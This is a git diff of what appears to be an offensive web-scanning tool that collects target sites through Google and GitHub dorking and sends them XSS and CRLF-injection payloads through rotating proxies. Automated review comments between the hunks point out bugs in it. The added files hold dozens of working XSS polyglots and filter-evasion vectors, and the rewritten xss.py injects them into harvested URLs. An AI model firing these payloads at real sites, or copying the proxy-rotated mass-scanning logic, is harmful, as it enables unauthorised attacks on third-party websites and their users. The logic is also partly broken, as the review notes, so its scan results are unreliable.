id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> +<div id="134"><xmp> +<% +</xmp> +<img alt='%></xmp><img src=xx:x onerror=aler +*{color:red}</style>//["'`-->]]>]</div> +<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> +<stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> +<template match="/"> +<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> +<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> +</template> +</stylesheet>//["'`-->]]>]</div> +<div id="136"><form action="" method="post"> +<input name="username" value="admin" /> 
+<input name="password" type="password" value="secret" /> +<input name="injected" value="injected" dirname="password" /> +<input type="submit"> +</form>//["'`-->]]>]</div> +<div id="137"><svg> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> +<circle r="400"></circle> +<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> +</a>//["'`-->]]>]</div> +<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined +<marquee loop=1 width=0 onfinish=alert(1)> +<marguee/onstart=alert(1)> +<svg onload=(alert)(1)> +<script>$=1,alert($)</script> +<form><button formaction="javascript:alert(1)"> +<div style=xss:expression(alert(1))> +<div style=xss:expression(1)-alert(1)> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio\006e(alert(1))> +<div style=xss:expressio\00006e(alert(1))> +<div style=xss:expressio\6e(alert(1))> +<div style=xss:expressio&#x5c;6e(alert(1))> diff --git a/bounty_drive/attacks/xss/payloads/xss-polyglots.txt b/bounty_drive/attacks/xss/payloads/xss-polyglots.txt new file mode 100644 index 0000000..c8cc176 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-polyglots.txt 
@@ -0,0 +1,49 @@ +javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> +javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> +javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> +javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` +javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` +javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> +javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script> +javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script> +javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script> +javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script> 
+javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script> +javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script> +javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//> +javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script> +javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//> +javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``> +javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script> +javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//> +javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()> +javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script> +javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()> +javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()> +javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=alert()><svg/\"/*<svg onload=' 
/**/-alert()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//> +javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script> +javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()> +javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()> +javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()// +javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()> +javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script> +javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()// +javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script> +javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()> +javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()// 
+javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script> +jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//> +javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()> +javascript:alert()//\ /*<svg/onload=';alert();'></textarea></style></title></noscript></template></noembed><frame onload=";alert();"></script>--><script>alert`;alert();`</script>*/alert()//\";alert()// +javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//--></template><frame/onload=alert() <img src=x onerror=alert()></style/</title/</textarea/</noscript/</noembed/</script><script>alert()</script> +javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/"/+/[*/[]/+alert()//'-->\" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>> +javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//--></title></style></noscript></textarea></template></noembed><script>alert()</script><frameset onload=alert()><svg/onload=alert(1)> alert()// +javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--><FRAME SRC="javascript:alert();"></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)// +javascript:alert()//<frame/src=javascript:alert()><svg/onload=alert()>`;alert()`';alert()//\";alert();//"//--></title></textarea></style></noscript></noembed></template></option></select></script><svg onload=alert()>*/ alert()//* 
+javascript:alert()//</title></style></textarea></noscript></template></noembed><script>alert()</script>-->\";alert()//";alert()//';alert()//<script>alert()</script><frame src="javascript:alert()">` alert()//<svg/onload=alert()>*/alert()/* +javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!-- +javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+alert()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+alert()//'>"><script>alert()</script><frame src="javascript:alert()"></frameset>+\"; alert()//<img src onerror=alert()> +javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:alert(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)// \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt b/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt new file mode 100644 index 0000000..41b83ee --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-without-parentheses-semi-colons-portswigger.txt 
@@ -0,0 +1,8 @@ +<script>onerror=alert;throw 1337</script> +<script>{onerror=alert}throw 1337</script> +<script>throw onerror=alert,'some string',123,'haha'</script> +<script>{onerror=eval}throw'=alert\x281337\x29'</script> +<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> +<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script> +<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> +<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/xss.py b/bounty_drive/attacks/xss/xss.py index e7f9cf9..bb85a50 100644 --- a/bounty_drive/attacks/xss/xss.py +++ b/bounty_drive/attacks/xss/xss.py 
@@ -2,66 +2,189 @@ # XSS Vulnerability testing functions ######################################################################################### import glob +import re import sys +import concurrent.futures import requests from termcolor import cprint from tqdm import tqdm -from utils.app_config import POTENTIAL_PATHS, VULN_PATHS -from utils.request_manager import inject_payload +from utils.proxies import round_robin_proxies from utils.waf_mitigation import waf_detector +from utils.app_config import POTENTIAL_PATHS, VULN_PATHS +from utils.request_manager import inject_params, inject_payload try: from selenium import webdriver from selenium.webdriver.chrome.service import Service from webdriver_manager.chrome import ChromeDriverManager except ImportError: - print("Selenium and webdriver_manager modules not found. Please make sure they are installed.") + print( + "Selenium and webdriver_manager modules not found. Please make sure they are installed." + ) sys.exit(1) + # Load proxies from file def load_xss_payload(): - payloads = {} - for payload_file in glob.glob("payloads/xss/*"): + """_summary_ + TODO manage vulnebility type + Returns: + _type_: _description_ + """ + payloads = [] + for payload_file in glob.glob("attacks/xss/payloads/*"): # Extract the vulnerability type from the filename - vuln_type = payload_file.split('/')[-1].replace('_xss_payload.txt', '') - with open(payload_file, 'r') as file: + with open(payload_file, "r") as file: # Assuming each file may contain multiple payloads, one per line - payloads[vuln_type] = [line.strip() for line in file.readlines()] + payloads.append([line for line in file.readlines()]) return payloads + +def generate_xss_urls(url): + """ + Adds payload to the URL and returns a set of parsed URLs + """ + xss_payloads = load_xss_payload() + injection = "Set-Cookie:nefcore=crlfsuite;" + parsed_urls = set() + verify_param = re.compile(r"=[^?\|&]*") + is_param = verify_param.search(url) + + # Escape characters + escape_chars = [ + 
"%0d", + "%0a", + "%0d%20", + "%0a%20", + "%3f", + "%0d%0a", + "%23%0d", + "%23%0a", + "%23%0d%0a", + "%u000a", + "%25%30%61", + "%25%30a", + "%3f%0d", + "%3f%0d%0a", + "%3f%0a", + "%%0a0a", + "%u000d", + "%u0000", + "%0d%09", + "%0d%0a%09", + "%0d%0a%20", + "%25250a", + "%250a", + "%2F..%0d%0a", + "%2f%2e%2e%0d%0a", + "%25%30", + "%2e%2e%2f%0d%0a", + "%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D", + "%E5%98%8A%E5%98%8D", + "%e5%98%8a%e5%98%8d%0a", + "%e5%98%8a%e5%98%8d%0d", + "%e5%98%8a%e5%98%8d%0d%0a", + f"\\r", + f"\\r\\n", + f"\\r\\t", + f"\\r\\n\\t", + f"\\r%20", + f"\\r\\n%20", + ] + + # These strings are used before the escape characters + starting_strings = ["", "crlfsuite", "?crlfsuite=", "#", "__session_start__/"] + + if is_param: + del starting_strings[2] + for string in starting_strings: + for each_escape in escape_chars: + injected_urls = inject_params(url, string + each_escape + injection) + for each_injected_url in injected_urls: + parsed_urls.add(each_injected_url) + + for payload in xss_payloads: + _injected = inject_params(url, payload) + for injected in _injected: + parsed_urls.add(injected) + else: + if not url.endswith("/"): + url = url + "/" + else: + None + for string in starting_strings: + for each_escape in escape_chars: + parsed_urls.add(url + string + each_escape + injection) + for payload in xss_payloads: + parsed_urls.add(url + payload) + total_len = len(parsed_urls) + + return parsed_urls, total_len + + +def test_xss_target(url, proxy): + total_parsed_targets = [] + cprint("Intializing Payload Generator...", color="yellow", file=sys.stderr) + parsed_target = generate_xss_urls(url) + for each in parsed_target[0]: + total_parsed_targets.append(each) + + is_waffed = waf_detector(url=url, proxies=proxy) + + if is_waffed: + cprint(f"WAF detected <!>", color="red", file=sys.stderr) + else: + cprint("WAF Status: Offline", color="green", file=sys.stderr) + + for payload_url in total_parsed_targets: + if payload_url in requests.get(payload_url, 
proxies=proxy).text: + return True, payload_url + else: + return False, payload_url + + def test_vulnerability_xss(proxies): """ Test a list of websites for XSS vulnerability using multithreading and proxies. """ - VULN_PATHS["xss"][1] = [] - - s = Service(ChromeDriverManager().install()) - driver = webdriver.Chrome(service=s) - - XSS_TEST_PAYLOAD = load_xss_payload() if len(POTENTIAL_PATHS["xss"][1]) > 0: - for website in tqdm(POTENTIAL_PATHS["xss"][1], desc=f"Testing for XSS for {website}", unit="site"): - url, _ = website - for payload in XSS_TEST_PAYLOAD: - WAF = waf_detector( - url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) - if WAF: - cprint(f'WAF detected <!>') - else: - cprint('WAF Status: Offline') - - payload_url = inject_payload(url, payload) - - if payload in requests.get(payload_url).text: - cprint(f"[VULNERABLE] {payload_url}", "red", file=sys.stderr) + proxy_cycle = round_robin_proxies(proxies) + VULN_PATHS["xss"][1] = [] + + # s = Service(ChromeDriverManager().install()) + # driver = webdriver.Chrome(service=s) + + # Now, append a proxy to each task + search_tasks_with_proxy = [] + for website in POTENTIAL_PATHS["xss"][1]: + proxy = next(proxy_cycle) + search_tasks_with_proxy.append({"website": website, "proxy": proxy}) + + with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: + future_to_search = { + executor.submit( + test_xss_target, task["website"], task["proxy"] + ): website + for task in search_tasks_with_proxy + } + for website in tqdm( + concurrent.futures.as_completed(future_to_search), + desc=f"Testing for XSS for {website}", + unit="site", + ): + result, payload_url = website.result() + if result: VULN_PATHS["xss"][1].append(payload_url) + cprint(f"[VULNERABLE] {payload_url}", "red", file=sys.stderr) else: cprint(f"[NOT VULNERABLE] {payload_url}", "green", file=sys.stderr) - - if VULN_PATHS["xss"][1]: - driver.execute_script("window.open('');") - 
driver.switch_to.window(driver.window_handles[-1]) - for vulnerable_url in VULN_PATHS["xss"][1]: - driver.get(vulnerable_url) + + # if VULN_PATHS["xss"][1]: + # driver.execute_script("window.open('');") + # driver.switch_to.window(driver.window_handles[-1]) + # for vulnerable_url in VULN_PATHS["xss"][1]: + # driver.get(vulnerable_url) + else: + cprint("No Potential XSS", color="red", file=sys.stderr) diff --git a/bounty_drive/attacks/xss/xss_config.py b/bounty_drive/attacks/xss/xss_config.py index b833626..de07f81 100644 --- a/bounty_drive/attacks/xss/xss_config.py +++ b/bounty_drive/attacks/xss/xss_config.py @@ -2,6 +2,10 @@ XSS_TEST_PAYLOAD = "<script>alert('XSS')</script>" -ENCODE_XSS = False -BLIND_XSS = False -FUZZ_XSS = False \ No newline at end of file +class XSSConfig: + ENCODE_XSS = False + BLIND_XSS = False + FUZZ_XSS = False + + +xss_config = XSSConfig() diff --git a/bounty_drive/bounty_drive.py b/bounty_drive/bounty_drive.py index 965bdeb..4e27497 100755 --- a/bounty_drive/bounty_drive.py +++ b/bounty_drive/bounty_drive.py 
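Review bot: In bounty_drive/attacks/xss/xss.py, `load_xss_payload` now appends one list per file, so `generate_xss_urls` reaches `parsed_urls.add(url + payload)` with `payload` being a list and raises `TypeError` for URLs without parameters, and the entries keep their trailing newline; flattening with `payloads.extend(line.strip() for line in file if line.strip())` would give one string per payload again. In `test_xss_target` both branches of the `if` return inside the `for` loop, so the `[NOT VULNERABLE]` verdict rests on a single request, and the test `payload_url in requests.get(...).text` looks for the whole URL in the body rather than the injected value, so neither outcome is reliable as reported. The `requests.get(payload_url, proxies=proxy)` call has no `timeout` and no `except requests.RequestException`, and because `website.result()` re-raises worker exceptions, one unreachable host aborts the whole run in `test_vulnerability_xss`; `requests.get(payload_url, proxies=proxy, timeout=10)` inside a `try` that returns `False, payload_url` on failure would contain it. `generate_xss_urls` also still carries `injection = "Set-Cookie:nefcore=crlfsuite;"` and the CRLF escape list, which look copied from a CRLF generator and probably do not belong in the XSS path.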
@@ -1,67 +1,120 @@ -#/usr/bin/python3 +# /usr/bin/python3 import argparse import sys from termcolor import colored, cprint -import terminal_banner -import random import os -import requests -import glob -import time -import threading -import concurrent.futures -import itertools -from tqdm import tqdm -from urllib3.util.retry import Retry -from requests.adapters import HTTPAdapter -from bs4 import BeautifulSoup -from urllib.parse import parse_qs -import urllib.parse as urlparse -import subprocess -import logging -import re -import json - - + + +from attacks.dorks import dorking_config from attacks.dorks.google_dorking import load_google_dorks_and_search -from attacks.sqli.sqli import test_vulnerability_sqli -from attacks.xss.xss import test_vulnerability_xss -from utils.banner import load_animation -from utils.proxies import setup_proxies + from attacks.dorks.github_dorking import * + +from utils.proxies import setup_proxies from utils.app_config import * + +from attacks.xss.xss import test_vulnerability_xss from attacks.xss.xss_config import * + from attacks.sqli.sqli_scan_config import * +from attacks.sqli.sqli import test_vulnerability_sqli + from utils.banner import * +from utils.banner import load_animation from utils.logger import * + import utils.logger -os. system('clear') - +os.system("clear") + ######################################################################################### # Main function -######################################################################################### +######################################################################################### + def get_user_arguments_input(): """ Collect user input for website extension, total output, and starting page number, with default values. 
""" - parser = argparse.ArgumentParser(description='Collect user input for scanning websites.') - - parser.add_argument('--extension', type=str, default=DEFAULT_EXTENSION, help='Website extension (default: .com)') - parser.add_argument('--subdomain', type=str, default="true", help='Restrict search to subdomain present in target.txt (default: true)') - parser.add_argument('--total_output', type=int, default=DEFAULT_TOTAL_OUTPUT, help='Total number of websites to scan (default: 10)') - parser.add_argument('--page_no', type=int, default=DEFAULT_PAGE_NO, help='Starting page number for Google search (default: 1)') - - parser.add_argument('--do_dorking_google', type=str, default="true", help='Perform Google dorking scan phase (default: true)') - parser.add_argument('--do_dorking_github', type=str, default="true", help='Perform Github dorking scan phase (default: true)') - - parser.add_argument('--do_xss', type=str, default="true", help='Test for XSS vulnerability (default: true)') - parser.add_argument('--do_encode_xss', type=str, default="true", help='Encode XSS payload (default: true)') - parser.add_argument('--do_fuzzing_xss', type=str, default="true", help='Fuzz XSS payload (default: true)') - parser.add_argument('--do_blind_xss', type=str, default="true", help='Test blind XSS payload (default: true)') - - parser.add_argument('--do_sqli', type=str, default="true", help='Test for SQLi vulnerability (default: true)') + parser = argparse.ArgumentParser( + description="Collect user input for scanning websites." 
+ ) + + parser.add_argument( + "--use_proxy", + type=str, + default="true", + help="Restrict search to subdomain present in target.txt (default: true)", + ) + parser.add_argument( + "--extension", + type=str, + default=DEFAULT_EXTENSION, + help="Website extension (default: .com)", + ) + parser.add_argument( + "--subdomain", + type=str, + default="true", + help="Restrict search to subdomain present in target.txt (default: true)", + ) + parser.add_argument( + "--total_output", + type=int, + default=DEFAULT_TOTAL_OUTPUT, + help="Total number of websites to scan (default: 10)", + ) + parser.add_argument( + "--page_no", + type=int, + default=DEFAULT_PAGE_NO, + help="Starting page number for Google search (default: 1)", + ) + + parser.add_argument( + "--do_dorking_google", + type=str, + default="true", + help="Perform Google dorking scan phase (default: true)", + ) + parser.add_argument( + "--do_dorking_github", + type=str, + default="true", + help="Perform Github dorking scan phase (default: true)", + ) + + parser.add_argument( + "--do_xss", + type=str, + default="true", + help="Test for XSS vulnerability (default: true)", + ) + parser.add_argument( + "--do_encode_xss", + type=str, + default="true", + help="Encode XSS payload (default: true)", + ) + parser.add_argument( + "--do_fuzzing_xss", + type=str, + default="true", + help="Fuzz XSS payload (default: true)", + ) + parser.add_argument( + "--do_blind_xss", + type=str, + default="true", + help="Test blind XSS payload (default: true)", + ) + + parser.add_argument( + "--do_sqli", + type=str, + default="true", + help="Test for SQLi vulnerability (default: true)", + ) args = parser.parse_args() 
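Review bot: The new `--use_proxy` option reuses the `--subdomain` help string, `help="Restrict search to subdomain present in target.txt (default: true)"`, so `--help` misdescribes the switch that decides whether traffic goes through proxies; something like `help="Route requests through the configured proxies (default: true)"` fits. The option is also `type=str`, and the following hunk assigns `use_proxy = args.use_proxy` without the `.lower() == "true"` conversion the other flags get, so `--use_proxy false` stays a truthy string unless the consumer (not visible here) compares it explicitly. The first line `# /usr/bin/python3` is a plain comment rather than a shebang; `#!/usr/bin/env python3` would let the file (mode 100755) be run directly. `get_user_arguments_input` continues past the end of this hunk.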
@@ -69,128 +122,293 @@ def get_user_arguments_input(): subdomain = args.subdomain.lower() == "true" total_output = args.total_output page_no = args.page_no - + do_dorking_google = args.do_dorking_google.lower() == "true" do_dorking_github = args.do_dorking_github.lower() == "true" - + do_xss = args.do_xss.lower() == "true" encode_xss = args.do_encode_xss.lower() == "true" fuzzing_xss = args.do_fuzzing_xss.lower() == "true" blind_xss = args.do_blind_xss.lower() == "true" - + do_sqli = args.do_sqli.lower() == "true" + use_proxy = args.use_proxy if subdomain: with open("target.txt", "r") as file: subdomain_list = file.read().splitlines() - cprint(f"Subdomains: {subdomain_list}", 'green', file=sys.stderr) + cprint(f"Subdomains: {subdomain_list}", "green", file=sys.stderr) + + cprint( + f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", + "green", + file=sys.stderr, + ) + + return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss, use_proxy - cprint(f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", 'green', file=sys.stderr) - - return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss def get_user_input(): """ Collect user input for website extension, total output, and starting page number, with default values. """ - extension = input(colored(f"Please specify the website extension(eg- .in,.com,.pk) [default: {DEFAULT_EXTENSION}] -----> ", 'cyan')) or DEFAULT_EXTENSION # TODO - subdomain = input(colored(f"Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> ", 'cyan')) or "true" - total_output = input(colored(f"Please specify the total no. 
of websites you want [default: {DEFAULT_TOTAL_OUTPUT}] ----> ", 'cyan')) or DEFAULT_TOTAL_OUTPUT - page_no = input(colored(f"From which Google page you want to start(eg- 1,2,3) [default: {DEFAULT_PAGE_NO}] ----> ", 'cyan')) or DEFAULT_PAGE_NO - - do_dorking_google = input(colored(f"Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_dorking_github = input(colored(f"Do you want to do the Github dorking scan phase ? [default: false (vs true)] ----> ", 'cyan')) or "false" - - do_xss = input(colored(f"Do you want to test for XSS vulnerability ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_xss = True if do_xss.lower() == "true" else False + use_proxy = ( + input( + colored( + f"Do you want to use proxies ? [default: true (vs false)] -----> ", + "cyan", + ) + ) + or "true" + ) + extension = ( + input( + colored( + f"Please specify the website extension(eg- .in,.com,.pk) [default: {DEFAULT_EXTENSION}] -----> ", + "cyan", + ) + ) + or DEFAULT_EXTENSION + ) # TODO + subdomain = ( + input( + colored( + f"Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> ", + "cyan", + ) + ) + or "true" + ) + total_output = ( + input( + colored( + f"Please specify the total no. of websites you want [default: {DEFAULT_TOTAL_OUTPUT}] ----> ", + "cyan", + ) + ) + or DEFAULT_TOTAL_OUTPUT + ) + page_no = ( + input( + colored( + f"From which Google page you want to start(eg- 1,2,3) [default: {DEFAULT_PAGE_NO}] ----> ", + "cyan", + ) + ) + or DEFAULT_PAGE_NO + ) + + do_dorking_google = ( + input( + colored( + f"Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_dorking_github = ( + input( + colored( + f"Do you want to do the Github dorking scan phase ? [default: false (vs true)] ----> ", + "cyan", + ) + ) + or "false" + ) + + do_xss = ( + input( + colored( + f"Do you want to test for XSS vulnerability ? 
[default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_xss = True if do_xss.lower() == "true" else False if do_xss: - do_encode_xss = input(colored(f"Do you want to encode XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_fuzzing_xss = input(colored(f"Do you want to fuzz XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_blind_xss = input(colored(f"Do you want to test blind XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - ENCODE_XSS = True if do_encode_xss.lower() == "true" else False - FUZZ_XSS = True if do_fuzzing_xss.lower() == "true" else False - BLIND_XSS = True if do_blind_xss.lower() == "true" else False - - do_sqli = input(colored(f"Do you want to test for SQLi vulnerability ? [default: false (vs true)] ----> ", 'cyan')) or "false" - + do_encode_xss = ( + input( + colored( + f"Do you want to encode XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_fuzzing_xss = ( + input( + colored( + f"Do you want to fuzz XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_blind_xss = ( + input( + colored( + f"Do you want to test blind XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + xss_config.ENCODE_XSS = True if do_encode_xss.lower() == "true" else False + xss_config.FUZZ_XSS = True if do_fuzzing_xss.lower() == "true" else False + xss_config.BLIND_XSS = True if do_blind_xss.lower() == "true" else False + else: + del POTENTIAL_PATHS["xss"] + del VULN_PATHS["xss"] + + do_sqli = ( + input( + colored( + f"Do you want to test for SQLi vulnerability ? 
[default: false (vs true)] ----> ", + "cyan", + ) + ) + or "false" + ) + # Ensure numeric inputs are correctly converted to integers TOTAL_OUTPUT = int(total_output) - PAGE_NO = int(page_no) - do_dorking_google = True if do_dorking_google.lower() == "true" else False - do_dorking_github = True if do_dorking_github.lower() == "true" else False - subdomain = True if subdomain.lower() == "true" else False - - - do_sqli = True if do_sqli.lower() == "true" else False + PAGE_NO = int(page_no) + do_dorking_google = True if do_dorking_google.lower() == "true" else False + do_dorking_github = True if do_dorking_github.lower() == "true" else False + subdomain = True if subdomain.lower() == "true" else False + use_proxy = True if use_proxy.lower() == "true" else False + + do_sqli = True if do_sqli.lower() == "true" else False + if do_sqli: + pass + else: + del POTENTIAL_PATHS["sqli"] + del VULN_PATHS["sqli"] + if subdomain: # TODO allow multiple subdomains with open("target.txt", "r") as file: subdomain = file.read().splitlines() - SUBDOMAIN = subdomain - - cprint(f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", 'green', file=sys.stderr) - - return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss + dorking_config.SUBDOMAIN = subdomain + + cprint( + f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", + "green", + file=sys.stderr, + ) + + return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss, use_proxy + if __name__ == "__main__": try: load_animation() if len(sys.argv) > 3: - extension, do_dorking_google, do_dorking_github, do_sqli, do_xss = get_user_arguments_input() + ( + extension, + do_dorking_google, + do_dorking_github, + do_sqli, + do_xss, + use_proxy, + ) = get_user_arguments_input() else: - extension, do_dorking_google, 
